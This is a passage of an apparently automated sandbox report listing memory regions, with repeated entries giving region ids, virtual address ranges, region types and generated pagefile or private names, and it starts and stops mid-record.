entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19621 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19622 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19623 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19624 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19625 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19626 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19627 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19628 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19629 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19630 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19631 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19632 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19633 start_va 
= 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19634 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19635 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19636 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19637 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19638 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19639 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19640 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19641 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19642 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19643 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19644 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19645 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 19646 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19647 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19648 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19649 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19650 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19651 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19652 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19653 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19654 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19655 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19656 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19657 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19658 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001800000" filename = "" Region: id = 19659 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19660 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19661 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19662 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19663 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19664 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19665 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19666 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19667 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19668 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19669 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19670 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19671 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19672 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19673 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19674 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19675 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19676 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19677 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19678 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19679 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19680 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19681 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19682 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19683 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19684 start_va = 0x2a0000 end_va 
= 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19685 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19686 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19687 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19688 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19689 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19690 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19691 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19692 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19693 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19694 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19695 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19696 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
19697 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19698 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19699 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19700 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19701 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19732 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19733 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19734 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19735 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19736 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19737 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19738 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19739 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 19740 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19854 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19855 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19856 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19857 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19858 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19859 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19860 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19861 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19862 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19863 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19864 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19865 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19866 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19867 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19868 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19869 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19870 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19871 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19872 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19873 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19874 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19875 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19876 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19877 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19878 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19879 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19880 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19881 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19882 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19883 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19884 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19915 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19916 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19917 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19918 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19919 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19920 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19921 start_va 
= 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19922 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19923 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19924 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19925 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19926 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19927 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19928 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19929 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19930 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19931 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19932 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19933 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 19934 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19935 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19936 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19937 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19938 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19939 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19940 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19941 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19942 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19943 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19949 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19950 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19951 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 19952 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19953 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19954 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19955 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19956 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19957 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19958 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19959 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19960 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19961 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19962 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19963 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19964 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19965 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19966 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19967 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19968 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19969 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19970 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19971 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19972 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19973 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19974 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19975 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19976 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19977 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19979 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19980 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19982 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19983 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19989 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19990 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19991 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19992 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19993 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19994 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
